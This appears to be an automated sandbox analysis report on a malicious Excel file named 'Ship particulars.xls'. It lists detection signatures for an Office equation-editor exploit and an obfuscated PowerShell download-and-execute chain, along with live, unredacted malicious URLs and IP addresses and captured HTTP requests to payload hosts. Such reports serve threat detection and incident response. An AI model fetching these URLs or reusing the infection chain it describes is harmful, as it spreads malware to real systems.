Windows Analysis Report
Ship particulars.xls

Overview

General Information

Sample name: Ship particulars.xls
Analysis ID: 1467087
MD5: 1746950a937d2735d7ad8b8633393471
SHA1: 3745c72e69666f9799f25d298f71ea05844a0226
SHA256: 91f02087f468183375ca7489c8936bb562e6d76a4cf39d6402aa9ee672e1c478
Tags: xls

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
AI detected suspicious Excel or Word document
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Excel Network Connections
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

Source: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?17198462358ZK; Avira URL Cloud: Label: malware
Source: http://91.92.254.29/Users_API/syscore/file_ygeik543.xh0.txt Avira URL Cloud: Label: malware
Source: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235p Avira URL Cloud: Label: malware
Source: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235 Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\uh.uh.uhuhuh.uu.uh[1].doc Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{45674ED6-0137-4508-99E9-56BDBC83CE0D}.tmp Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4924813.doc Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: Ship particulars.xls ReversingLabs: Detection: 21%
Source: Ship particulars.xls Joe Sandbox ML: detected

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 198.46.178.139 Port: 80
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_035B05CF ShellExecuteW,ExitProcess, 9_2_035B05CF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_035B05F4 ExitProcess, 9_2_035B05F4
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_035B04E8 LoadLibraryW, 9_2_035B04E8
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_035B05A1 URLDownloadToFileW,ShellExecuteW,ExitProcess, 9_2_035B05A1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_035B05BA ShellExecuteW,ExitProcess, 9_2_035B05BA
Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic DNS query: name: hop.fyi
Source: global traffic DNS query: name: uploaddeimagens.com.br
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 198.46.178.139:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 91.92.254.29:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.46.178.139:80
Source: global traffic TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.46.178.139:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.46.178.139:80
Source: global traffic TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 192.185.89.92:80
Source: global traffic TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.46.178.139:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global traffic TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
Source: global traffic TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.46.178.139:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.46.178.139:80
Source: global traffic TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80
Source: global traffic TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80
Source: global traffic TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 198.46.178.139:80
Source: global traffic TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 198.46.178.139:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 198.46.178.139:80
Source: global traffic TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 198.46.178.139:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 198.46.178.139:80
Source: global traffic TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 198.46.178.139:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 91.92.254.29:80
Source: global traffic TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 91.92.254.29:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 91.92.254.29:80
Source: global traffic TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 198.46.178.139:80
Source: global traffic TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 91.92.254.29:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 192.185.89.92:80
Source: global traffic TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80
Source: global traffic TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80
Source: global traffic TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80
Source: global traffic TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 192.185.89.92:80
Source: global traffic TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 91.92.254.29:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 91.92.254.29:80
Source: global traffic TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 192.185.89.92:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80

Networking

Source: Traffic Snort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 91.92.254.29:80 -> 192.168.2.22:49173
Source: C:\Windows\SysWOW64\wscript.exe Network Connect: 91.92.254.29 80
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_035B05A1 URLDownloadToFileW,ShellExecuteW,ExitProcess, 9_2_035B05A1
Source: global traffic HTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 192.185.89.92 192.185.89.92
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View ASN Name: THEZONEBG THEZONEBG
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global traffic HTTP traffic detected: GET /sWel7 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hop.fyiConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /33144/ee/uh.uh.uhuhuh.uu.uh.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.139Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /33144/creatingfollowerswithflowereseverytime.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.139Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Users_API/syscore/file_ygeik543.xh0.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 91.92.254.29
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.178.139
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6C22A3A6.emf
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: hop.fyi
Source: global traffic DNS traffic detected: DNS query: uploaddeimagens.com.br
Source: EQNEDT32.EXE, 00000009.00000002.416768338.000000000053E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://198.46.178.139/33144/creatingfollowerswithflowereseverytime.gif
Source: EQNEDT32.EXE, 00000009.00000002.416768338.000000000053E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://198.46.178.139/33144/creatingfollowerswithflowereseverytime.gifM
Source: EQNEDT32.EXE, 00000009.00000002.417220147.00000000035B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://198.46.178.139/33144/creatingfollowerswithflowereseverytime.gifj
Source: wscript.exe, 0000000A.00000002.431883950.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.431709311.000000000055A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.431533301.0000000000546000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.431803798.0000000000548000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.431300484.000000000055A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.431579559.000000000051D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.431300484.0000000000546000.00000004.00000020.00020000.00000000.sdmp, creatingfollowerswithflowereseverytime[1].gif.9.dr, creatingfollowerswithflowerese.vBS.9.dr String found in binary or memory: http://91.92.254.29/Users_API/syscore/file_ygeik543.xh0.txt
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 0000000C.00000002.429913988.00000000029DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://go.micros
Source: hop.fyi.url.3.dr String found in binary or memory: http://hop.fyi/
Source: Ship particulars.xls, sWel7.url.3.dr String found in binary or memory: http://hop.fyi/sWel7
Source: 92530000.0.dr, ~DF8FA74BFE73643F78.TMP.0.dr String found in binary or memory: http://hop.fyi/sWel7yX
Source: powershell.exe, 0000000C.00000002.430713228.0000000003399000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 0000000C.00000002.429913988.0000000002371000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000C.00000002.429913988.0000000002E95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://uploaddeimagens.com.br
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 0000000C.00000002.430713228.0000000003399000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.430713228.0000000003399000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.430713228.0000000003399000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000C.00000002.430713228.0000000003399000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 0000000C.00000002.429913988.0000000002E8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 0000000C.00000002.429760140.0000000000700000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002371000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://uploaddeimagens.com.br/i
Source: powershell.exe, 0000000C.00000002.431058539.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.00000000024A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235
Source: powershell.exe, 0000000C.00000002.429913988.00000000024A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?17198462358ZK;
Source: powershell.exe, 0000000C.00000002.429913988.00000000029DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235p
Source: powershell.exe, 0000000C.00000002.429913988.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002EFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: powershell.exe, 0000000C.00000002.429913988.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002EFC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown Network traffic detected: HTTP traffic on port 49174 -> 443

System Summary

Source: Process Memory Space: powershell.exe PID: 3440, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
